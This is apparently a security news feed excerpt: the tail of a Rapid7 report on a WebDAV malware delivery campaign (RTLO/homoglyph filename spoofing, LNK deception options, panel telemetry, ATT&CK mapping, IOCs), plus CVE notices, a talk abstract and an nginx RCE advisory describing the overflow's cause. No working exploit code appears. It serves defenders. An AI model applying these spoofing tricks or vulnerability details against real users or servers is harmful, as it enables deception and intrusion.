- **`HyperPackSetup`** — base filename / базовое имя файла
- **`&lt;method&gt;`** — WebDAV open method (e.g. `curl-http-temp-run`, `direct`, `cmd-start`) / метод открытия WebDAV
- **`&lt;trick&gt;`** — LNK deception technique (`standard`, `SPOOFEXE_HIDEARGS_DISABLETARGET`, etc.) / техника обмана LNK
- **`&lt;spoof&gt;`** — RTLO + homoglyph extension spoof (`‮ƒｄᴘ`) — visually appears as `.pdf` / спуф расширения через RTLO + гомоглифы — визуально выглядит как `.pdf`
- **`.lnk`** — real extension / реальное расширение

&gt; The spoof is applied **only to the extension** at the end, so the method and trick names remain clearly readable.  
&gt; Спуф применяется **только к расширению** в конце имени, поэтому названия методов и техник остаются читаемыми.
...</pre><p><span><em>Figure 11: This is a snippet from another </em></span><span><span data-type="inlineCode"><em>README.md</em></span></span><span><em>. The full README is available on Rapid7 Labs' </em></span><a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank"><span><em>Github</em></span></a><span><em>. The text is original, and the translation to Russian was not added by us.</em></span></p><h3>OPSEC is hard </h3><p><span>As we mentioned previously, one of the artifacts we found in the open directory was a presentation file documenting a WebDAV delivery/admin panel called “Simba Service.”</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" alt="simba-service-presentation.png" caption="Figure 12: Simba service presentation." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-presentation.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" data-sys-asset-uid="blte7a569d4a484149e" data-sys-asset-filename="simba-service-presentation.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 12: Simba service presentation." data-sys-asset-alt="simba-service-presentation.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 12: Simba service presentation.</figcaption></div></figure><p>⠀</p><p><span>The panel was built to manage a read-only WebDAV file share and track delivery activity in real time, including file opens, visitor IPs, geolocation, Windows versions, traffic, errors, folder-level conversion, and access events.</span></p><p><span>The actor not only used the same server for testing and staging files, but also recklessly left behind internal documentation for the backend used to manage and track delivery. The presentation reads like an internal build document, walking through the architecture, tech stack, API endpoints, authentication, logging, analytics, bug fixes, deployment setup, and panel access flow. It also included the panel IP and port, along with credentials.</span></p><p><span>Additionally, the file also looked like it was generated with an LLM. Its structured project overview, emoji-heavy sections, API-documentation format, and implementation details stood out. Basically, in some subfolders you can find LLM-generated READMEs with lures and malicious executables, while in another subfolder there is an admin panel with a hardcoded IP, port, and credentials.</span></p><p><span>We are intentionally withholding live access details, credentials, IP addresses, ports, and panel locations.</span></p><h3>Delivery panel overview</h3><p><span>The attacker appeared to have deployed the panel as-is, without changing the default password or port. The panel included several operator-facing sections: Review, Folders, Files, Visitors, Geography, Traffic/Server, Notes, File Manager, Users, Link Builder, Safety, and Documentation.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" alt="simba-service-page-with-blocking-capabilities_.png" caption="Figure 13: Simba service page with blocking capabilities." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" data-sys-asset-uid="blt20dc8a76cc4cdc10" data-sys-asset-filename="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 13: Simba service page with blocking capabilities." data-sys-asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 13: Simba service page with blocking capabilities.</figcaption></div></figure><p>⠀</p><p><span>The portal was capable of detecting scanners and bots by analyzing behavioral indicators, including requests for non-existent resources, HTTP 404 responses, WebDAV probes, and directory enumeration attempts. Based on these observations, it assigned a risk score to each IP address and allowed the operator to manually block flagged hosts. Portal records indicate that the blocking configuration was modified at least 3 times during the campaign (June 5, June 10, and June 20).</span></p><p><span>We analyzed telemetry from the WebDAV delivery service over an approximately 5.5-day window (June 20–26, 2026 UTC), which recorded 77,098 requests from 3,892 unique client IPs across 101 countries, with roughly 45.9 GB transferred.</span></p><p><span>The activity was short-lived and high-volume, peaking between June 21 and June 24 before dropping sharply. Based on this data we can assume that it was a targeted delivery campaign.</span></p><p><span>Most of the launch activity came from one specific lure: a CURP-themed fake PDF report under the </span><span><span data-type="inlineCode">/Downloads/CURP/ReportFinal.rcs.pdf</span></span><span> (RTLO-spoofed </span><span><span data-type="inlineCode">.scr</span></span><span> executable.) Out of 2,441 observed executable launch events, 2,384, or approximately 97.7%, were tied to this lure. It accounted for approximately 14.6 GB of traffic and was accessed by 1,869 unique client IPs.</span></p><p><span>The WebDAV traffic was heavily concentrated in Mexico. Mexico generated 63,622 requests, representing 82.5% of all traffic, and 2,365 launch events, or approximately 96.9% of all observed launches. The next largest sources of traffic, including the United States and Germany, produced far fewer launch events and appeared more consistent with scanning, research, or automated retrieval.</span></p><p><em></em></p><table><colgroup data-width="1250"><col><col><col><col><col></colgroup><tbody><tr><td><p><span><strong>Country</strong></span></p></td><td><p><span><strong>Requests</strong></span></p></td><td><p><span><strong>Share of requests</strong></span></p></td><td><p><span><strong>Unique client IPs</strong></span></p></td><td><p><span><strong>Launch events</strong></span></p></td></tr><tr><td><p><span>Mexico</span></p></td><td><p><span>63,622</span></p></td><td><p><span>82.5%</span></p></td><td><p><span>2,698</span></p></td><td><p><span>2,365</span></p></td></tr><tr><td><p><span>United States</span></p></td><td><p><span>4,032</span></p></td><td><p><span>5.2%</span></p></td><td><p><span>463</span></p></td><td><p><span>47</span></p></td></tr><tr><td><p><span>Germany</span></p></td><td><p><span>2,751</span></p></td><td><p><span>3.6%</span></p></td><td><p><span>59</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>United Kingdom</span></p></td><td><p><span>645</span></p></td><td><p><span>0.8%</span></p></td><td><p><span>40</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Netherlands</span></p></td><td><p><span>532</span></p></td><td><p><span>0.7%</span></p></td><td><p><span>49</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>France</span></p></td><td><p><span>407</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>21</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Finland</span></p></td><td><p><span>401</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>6</span></p></td><td><p><span>10</span></p></td></tr><tr><td><p><span>Brazil</span></p></td><td><p><span>343</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>41</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Republic of Korea</span></p></td><td><p><span>312</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>16</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 3: Geographic distribution of WebDAV delivery activity.</em></span></p><p><span><em></em></span></p><p><span>Mexico was not only the largest source of traffic, but also the source of nearly all observed launch activity. Within Mexico, the activity was geographically broad, spanning hundreds of cities rather than clustering around a single locality. The top five Mexican cities accounted for approximately 27.4% of Mexican launch events, with Mexico City alone accounting for approximately 15.7%.</span></p><p><span>Hourly requests to the WebDAV delivery service also supported the assessment that much of the traffic came from real user interaction rather than only automated internet scanners. Traffic peaked between 16:00 and 19:00 UTC, which corresponds to working hours in central Mexico.</span></p><p><span>By launch events, we mean cases where the WebDAV panel showed that a client opened or requested an executable file in a way that looked like an attempted run, such as a </span><span><span data-type="inlineCode">GET</span></span><span> request for an </span><span><span data-type="inlineCode">.scr</span></span><span> or </span><span><span data-type="inlineCode">.exe</span></span><span> file from the delivery share. This does not mean we confirmed malware execution on the endpoint. It means the delivery infrastructure saw the file being accessed or invoked.</span></p><h2>Protocol behavior</h2><p><span>The HTTP methods and status codes show how clients interacted with the WebDAV delivery service. </span><span><span data-type="inlineCode">PROPFIND</span></span><span> requests and </span><span><span data-type="inlineCode">207</span></span><span> responses indicate directory browsing, which is typical when Windows Explorer accesses a remote WebDAV location. </span><span><span data-type="inlineCode">GET</span></span><span> requests and </span><span><span data-type="inlineCode">200</span></span><span> responses show file retrieval, including executable files opened or requested from the share.</span></p><p><span></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Method</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>PROPFIND</span></p></td><td><p><span>57,287</span></p></td></tr><tr><td><p><span>GET</span></p></td><td><p><span>13,088</span></p></td></tr><tr><td><p><span>OPTIONS</span></p></td><td><p><span>6,597</span></p></td></tr><tr><td><p><span>PROPPATCH</span></p></td><td><p><span>125</span></p></td></tr><tr><td><p><span>LOCK</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 4: HTTP methods observed in WebDAV delivery traffic.</em></span></p><p><span><em></em></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Status</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>207</span></p></td><td><p><span>57,412</span></p></td></tr><tr><td><p><span>200</span></p></td><td><p><span>19,532</span></p></td></tr><tr><td><p><span>206</span></p></td><td><p><span>154</span></p></td></tr></tbody></table><p><span><em>Table 5: HTTP status codes observed in WebDAV delivery traffic.</em></span></p><h2><span>MITRE ATT&amp;CK techniques</span></h2><table><colgroup data-width="1010"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Name</strong></span></p></td><td><p><span><strong>MITRE ATT&amp;CK technique</strong></span></p></td><td><p><span><strong>Code</strong></span></p></td></tr><tr><td><p><span>Payload execution</span></p></td><td><p><span>User Execution: Malicious File</span></p></td><td><p><span>T1204.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Right-to-Left Override</span></p></td><td><p><span>T1036.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Double File Extension</span></p></td><td><p><span>T1036.007</span></p></td></tr><tr><td><p><span>DLL sideloading</span></p></td><td><p><span>Hijack Execution Flow: DLL</span></p></td><td><p><span>T1574.001</span></p></td></tr><tr><td><p><span>Obfuscation</span></p></td><td><p><span>Encrypted/Encoded File</span></p></td><td><p><span>T1027.013</span></p></td></tr><tr><td><p><span>Payload unpacking</span></p></td><td><p><span>Deobfuscate/Decode Files or Information</span></p></td><td><p><span>T1140</span></p></td></tr><tr><td><p><span>Payload carrier</span></p></td><td><p><span>Steganography / image-carried payload data</span></p></td><td><p><span>T1027.003</span></p></td></tr><tr><td><p><span>API hiding</span></p></td><td><p><span>Dynamic API Resolution</span></p></td><td><p><span>T1027.007</span></p></td></tr><tr><td><p><span>In-memory loading</span></p></td><td><p><span>Reflective Code Loading</span></p></td><td><p><span>T1620</span></p></td></tr><tr><td><p><span>Injection</span></p></td><td><p><span>Process Hollowing</span></p></td><td><p><span>T1055.012</span></p></td></tr><tr><td><p><span>Native API use</span></p></td><td><p><span>Native API</span></p></td><td><p><span>T1106</span></p></td></tr><tr><td><p><span>Sandbox evasion</span></p></td><td><p><span>Time Based Evasion</span></p></td><td><p><span>T1497.003</span></p></td></tr><tr><td><p><span>Anti-analysis</span></p></td><td><p><span>Debugger / instrumentation checks</span></p></td><td><p><span>T1622</span></p></td></tr><tr><td><p><span>UAC bypass</span></p></td><td><p><span>Bypass User Account Control</span></p></td><td><p><span>T1548.002</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Registry Run Keys / Startup Folder</span></p></td><td><p><span>T1547.001</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Scheduled Task</span></p></td><td><p><span>T1053.005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Keylogging</span></p></td><td><p><span>T1056.001</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Screen Capture</span></p></td><td><p><span>T1113</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Clipboard Data</span></p></td><td><p><span>T1115</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Credentials from Web Browsers</span></p></td><td><p><span>T1555.003</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Steal Web Session Cookie</span></p></td><td><p><span>T1539</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Data from Local System</span></p></td><td><p><span>T1005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Automated Collection</span></p></td><td><p><span>T1119</span></p></td></tr><tr><td><p><span>Staging</span></p></td><td><p><span>Archive Collected Data: Archive via Utility</span></p></td><td><p><span>T1560.001</span></p></td></tr><tr><td><p><span>C2</span></p></td><td><p><span>Encrypted Channel</span></p></td><td><p><span>T1573</span></p></td></tr><tr><td><p><span>Exfiltration</span></p></td><td><p><span>Exfiltration Over C2 Channel</span></p></td><td><p><span>T1041</span></p></td></tr><tr><td><p><span>Possible persistence</span></p></td><td><p><span>WMI Event Subscription</span></p></td><td><p><span>T1546.003</span></p></td></tr><tr><td><p><span>Phishing lure generation</span></p></td><td><p><span>Generate Phishing Lures</span></p></td><td><p><span>AML.T0052</span></p></td></tr><tr><td><p><span>Resource Development</span></p></td><td><p><span>Resource Development</span></p></td><td><p><span>AML.TA0003</span></p></td></tr><tr><td><p><span>Obtain capabilities via LLM tooling</span></p></td><td><p><span>Obtain Capabilities</span></p></td><td><p><span>AML.T0016</span></p></td></tr><tr><td><p><span>LLM-assisted capability development</span></p></td><td><p><span>Develop Capabilities</span></p></td><td><p><span> AML.T0017</span></p></td></tr><tr><td><p><span>LLM prompt crafting for attack documentation</span></p></td><td><p><span>LLM Prompt Crafting</span></p></td><td><p><span>AML.T0065</span></p></td></tr><tr><td><p><span>Obtain capabilities via tooling</span></p></td><td><p><span>Obtain Capabilities: Software Tools</span></p></td><td><p><span>AML.T0016.001</span></p></td></tr></tbody></table><h2><span>Indicators of compromise (IOCs)</span></h2><h3>CURP campaign</h3><p>Phishing page: hxxps://gobf[.]mx </p><p>WebDav server: onedrive[.]cv</p><p></p><p>ReportFinal.&lt;RLO&gt;.scr    SHA256 04A8018191F2E9E76072D072A933371D9D669A42DE2B2A087541CD3A653B0BA7</p><p></p><p>C2: 77.110.127.205 ports 56001-56003 / 57666 / 57777 / 57888</p><p>Domain: google.services[.]ug</p><p>Campaign tag:06x12x2026SantaEbash2  (v4.4.3)</p><p>Schedule tasks: brokerhost, net_queue_32</p><p></p><p>Staging paths:</p><p>%TEMP%\is-XXXXX.tmp\Fo-Binary.exe </p><p>%AppData%\Roaming\inttracer_i686_prod\      </p><p> C:\ProgramData\inttracer_i686_prod\</p><h3>DlrtyGames campaign </h3><p>C2: 23[.]94[.]252[.]228:57666</p><p>JA3: fc54e0d16d9764783542f0146a98b300</p><p>DlrtyGames.exe</p><p>SHA256: e8be17a7fbef48b45f1e958b3ae5ebdfcad58808969982c431a905eefcae5268</p><p>discord-rpc.x64.dll</p><p>SHA256: 449d1121fa275879af22a20407aa7253ac750ac8fa7ff5691101752600d645df</p><p>profiler16.dll</p><p>SHA256: a88f5ee748e60f889d046718bfe3ddcf1c5f3cba2001cad587e8953a76bf7aa9</p><p>loader-pool.db</p><p>SHA256: 51a02eccdcae0483c7cbb9796738eee6c2a13b740d30e5417cda09bf418ea93b</p><p>.NET RAT</p><p>SHA256: 82e67735cf822db8f2f759e742e5bf8c54fdbd01a4170619b9e0916e1b3f5923</p><p>Staging paths:</p><p>C:\ProgramData\basenet\</p><p>%APPDATA%\basenet\</p><p>Persistence:</p><p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XNNNMHJAZNCNHGIKJDW</p><p>\com_app_bg_i686</p><p>\messenger_component_v8_32_rc</p><p></p><p>More indicators of compromise can be found on Rapid7’s <a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank">GitHub</a>.</p><h2>Rapid7 customers</h2><p>Customers using Rapid7’s Intelligence Hub gain direct access to all IOCs from this campaign, including any future indicators as they are identified.</p><h2>Conclusion</h2><p><span>The operator’s OPSEC failed in the best way possible for defenders. Thanks to a completely exposed server, we managed to pull down their entire operational toolkit: staged payloads, lure templates, testing files, builder notes, and active campaign artifacts. This sloppiness effectively offered a rare, transparent view of their end-to-end delivery pipeline rather than just the final malware it served.</span></p><p><span>The real impact shows up in speed and scale. The actor generated lure variants in bulk, tested them systematically, documented results, and refined delivery techniques in short cycles. The artifacts also suggested that attackers used LLM for rapid lure generation and development since their cPanel was vibecoded. </span></p><p><span>While the fact that attackers are adopting genAI in their workflows is nothing new, looking past the novelty reveals a much more practical shift in adversary operations.</span></p><p><span>The takeaway isn’t that “AI wrote the malware.” It’s that the attacker used LLMs to operate more like a modern software product team. The use of genAI enables them to prototype, test, and scale their delivery pipeline at a fast pace.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50318 | Microsoft Windows up to Server 2025 ReFS stack-based overflow]]></title>
<description><![CDATA[A vulnerability was found in Microsoft Windows. It has been rated as problematic. The affected element is an unknown function of the component ReFS. Performing a manipulation results in stack-based buffer overflow.

This vulnerability was named CVE-2026-50318. The attack needs to be approached lo...]]></description>
<link>https://tsecurity.de/de/3681132/sicherheitsluecken/cve-2026-50318-microsoft-windows-up-to-server-2025-refs-stack-based-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681132/sicherheitsluecken/cve-2026-50318-microsoft-windows-up-to-server-2025-refs-stack-based-overflow/</guid>
<pubDate>Mon, 20 Jul 2026 14:39:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. The affected element is an unknown function of the component <em>ReFS</em>. Performing a manipulation results in stack-based buffer overflow.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-50318">CVE-2026-50318</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49790 | Microsoft Windows up to Server 2025 Universal Disk Format File System Driver heap-based overflow]]></title>
<description><![CDATA[A vulnerability has been found in Microsoft Windows and classified as problematic. Affected by this issue is some unknown functionality of the component Universal Disk Format File System Driver. Performing a manipulation results in heap-based buffer overflow.

This vulnerability was named CVE-202...]]></description>
<link>https://tsecurity.de/de/3681126/sicherheitsluecken/cve-2026-49790-microsoft-windows-up-to-server-2025-universal-disk-format-file-system-driver-heap-based-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681126/sicherheitsluecken/cve-2026-49790-microsoft-windows-up-to-server-2025-universal-disk-format-file-system-driver-heap-based-overflow/</guid>
<pubDate>Mon, 20 Jul 2026 14:39:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is some unknown functionality of the component <em>Universal Disk Format File System Driver</em>. Performing a manipulation results in heap-based buffer overflow.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-49790">CVE-2026-49790</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Xelatype: a journey through time and space (emf2026)]]></title>
<description><![CDATA[In my quest for Weird Art, long have I wanted to build a digital slit-scan camera. The idea was to take a linear CCD, a load of RAM, and glue them together with an FPGA.

But as I pursued the project, things went in a strange new direction, and I ended up creating something different, something s...]]></description>
<link>https://tsecurity.de/de/3681108/it-security-video/the-xelatype-a-journey-through-time-and-space-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681108/it-security-video/the-xelatype-a-journey-through-time-and-space-emf2026/</guid>
<pubDate>Mon, 20 Jul 2026 14:33:31 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In my quest for Weird Art, long have I wanted to build a digital slit-scan camera. The idea was to take a linear CCD, a load of RAM, and glue them together with an FPGA.

But as I pursued the project, things went in a strange new direction, and I ended up creating something different, something so fascinatingly odd that it changed the way I think about time and space. It all got quite philosophical.

Egotistically I named the project after my online alias, and then kept it secret for the best part of a decade. In this talk, all shall be revealed...

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/205-the-xelatype-a-journey-through-time-and-space]]></content:encoded>
</item>
<item>
<title><![CDATA[The Xelatype: a journey through time and space (emf2026)]]></title>
<description><![CDATA[In my quest for Weird Art, long have I wanted to build a digital slit-scan camera. The idea was to take a linear CCD, a load of RAM, and glue them together with an FPGA.

But as I pursued the project, things went in a strange new direction, and I ended up creating something different, something s...]]></description>
<link>https://tsecurity.de/de/3681057/it-security-video/the-xelatype-a-journey-through-time-and-space-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681057/it-security-video/the-xelatype-a-journey-through-time-and-space-emf2026/</guid>
<pubDate>Mon, 20 Jul 2026 13:48:49 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In my quest for Weird Art, long have I wanted to build a digital slit-scan camera. The idea was to take a linear CCD, a load of RAM, and glue them together with an FPGA.

But as I pursued the project, things went in a strange new direction, and I ended up creating something different, something so fascinatingly odd that it changed the way I think about time and space. It all got quite philosophical.

Egotistically I named the project after my online alias, and then kept it secret for the best part of a decade. In this talk, all shall be revealed...

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/205-the-xelatype-a-journey-through-time-and-space]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. Prosecutors Charge Russian Trio in Cybercrimes Causing More Than $62 Million in Losses]]></title>
<description><![CDATA[Federal prosecutors have charged three Russian nationals over infrastructure that allegedly enabled ransomware, malware, phishing, and other cyberattacks against organizations in the United States and abroad. The seven-year investigation links the activity to more than $62 million in victim losse...]]></description>
<link>https://tsecurity.de/de/3680488/it-security-nachrichten/us-prosecutors-charge-russian-trio-in-cybercrimes-causing-more-than-62-million-in-losses/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680488/it-security-nachrichten/us-prosecutors-charge-russian-trio-in-cybercrimes-causing-more-than-62-million-in-losses/</guid>
<pubDate>Mon, 20 Jul 2026 09:22:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Federal prosecutors have charged three Russian nationals over infrastructure that allegedly enabled ransomware, malware, phishing, and other cyberattacks against organizations in the United States and abroad. The seven-year investigation links the activity to more than $62 million in victim losses across essential sectors. The alleged operation did not depend on one named malware family. Instead, […]</p>
<p>The post <a href="https://cybersecuritynews.com/russian-trio-in-cybercrimes/">U.S. Prosecutors Charge Russian Trio in Cybercrimes Causing More Than $62 Million in Losses</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-42533 Exposes Critical Pre-Auth nginx RCE Flaw]]></title>
<description><![CDATA[A newly disclosed security flaw, CVE-2026-42533, has revealed a critical Pre-Auth nginx vulnerability that could allow attackers to achieve reliable RCE (remote code execution) without authentication. The issue affects nginx versions 0.9.6 through 1.30.3 (stable) and 1.31.2 (mainline), while patc...]]></description>
<link>https://tsecurity.de/de/3680443/it-security-nachrichten/cve-2026-42533-exposes-critical-pre-auth-nginx-rce-flaw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680443/it-security-nachrichten/cve-2026-42533-exposes-critical-pre-auth-nginx-rce-flaw/</guid>
<pubDate>Mon, 20 Jul 2026 08:52:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1217" height="768" src="https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="CVE-2026-42533" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533.webp 1217w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-300x189.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-1024x646.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-768x485.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-600x379.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-150x95.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-750x473.webp 750w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-1140x719.webp 1140w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533.webp 1217w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-300x189.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-1024x646.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-768x485.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-600x379.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-150x95.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-750x473.webp 750w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-42533-1140x719.webp 1140w" sizes="(max-width: 1217px) 100vw, 1217px" title="CVE-2026-42533 Exposes Critical Pre-Auth nginx RCE Flaw 1"></p><span data-contrast="auto">A newly disclosed security flaw, CVE-2026-42533, has revealed a critical Pre-Auth nginx vulnerability that could allow attackers to achieve reliable RCE (remote code execution) without authentication. The issue affects nginx versions 0.9.6 through 1.30.3 (stable) and 1.31.2 (mainline), while patched releases include 1.30.4 and 1.31.3. Affected NGINX Plus versions include R33-R36 (fixed in R36 P7) and 37.0.0.1-37.0.2.1 (fixed in 37.0.3.1).</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to the disclosure, the <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="29039">vulnerability</a> stems from a missing save-and-restore mechanism for PCRE capture state within nginx's two-pass script evaluation engine. The flaw enables attackers to trigger a heap buffer overflow with attacker-controlled content and length, while also exposing heap pointers through an information leak that can defeat Address Space Layout Randomization (ASLR). Chaining both primitives enables reliable Pre-Auth nginx RCE.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">CVE-2026-42533 Impacts Multiple Configurations</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The <a href="https://cyberstan.co.uk/nginx-rce/" target="_blank" rel="nofollow noopener">advisory warns</a> that deployments using map directives with regex patterns alongside regex capture sources, including location, server_name, rewrite, or if blocks, may be vulnerable. The issue depends on evaluation order, where regex capture references, such as $1 or named groups, are processed before a regex map variable.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Affected directives include proxy_set_header, proxy_method, proxy_pass, fastcgi_param, uwsgi_param, scgi_param, grpc_set_header, return, add_header, rewrite, set, root, alias, and access_log, among others. Both HTTP and stream modules are affected, and the <a href="https://thecyberexpress.com/default-credentials-polish-energy-grid-attack/" target="_blank" rel="noopener">vulnerable</a> capture and map variables do not need to exist within the same directive.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Technical Root Cause</span></b></h3>
<span data-contrast="auto">The researcher explained that nginx evaluates expressions in two stages: a length calculation (LEN) pass followed by a value (VALUE) pass. During execution, regex map evaluation overwrites shared capture <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29040">data</a> stored in the request object. As a result, the LEN pass and VALUE pass can calculate different capture sizes, causing either a heap overflow or an information leak depending on the relative capture lengths.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The disclosure states that attackers can control both the overflow size and leaked data using ordinary HTTP requests, including request URIs, headers, and bodies. No credentials, client certificates, or unusual configuration beyond the vulnerable pattern are required.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Testing reportedly achieved 10 out of 10 successful <a href="https://thecyberexpress.com/rcritical-ivanti-csa-vulnerabilities-exploited/" target="_blank" rel="noopener">exploitations</a> on Ubuntu 24.04 using glibc 2.39 with ASLR enabled.</span>
<h3 aria-level="2"><b><span data-contrast="none">Mitigation and Disclosure</span></b></h3>
<span data-contrast="auto">The researcher said recent fixes for CVE-2026-42945, CVE-2026-9256, CVE-2026-42055, and CVE-2026-48142 do not address CVE-2026-42533. Administrators are advised to upgrade immediately to nginx 1.30.4, 1.31.3, or the corresponding patched NGINX Plus releases.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Until systems are updated, defenders should audit configurations that combine regex captures with regex map variables in the same evaluation path. The researcher also released a static configuration scanner that identifies vulnerable configurations without exploiting them.</span><span data-ccp-props="{}"> </span>

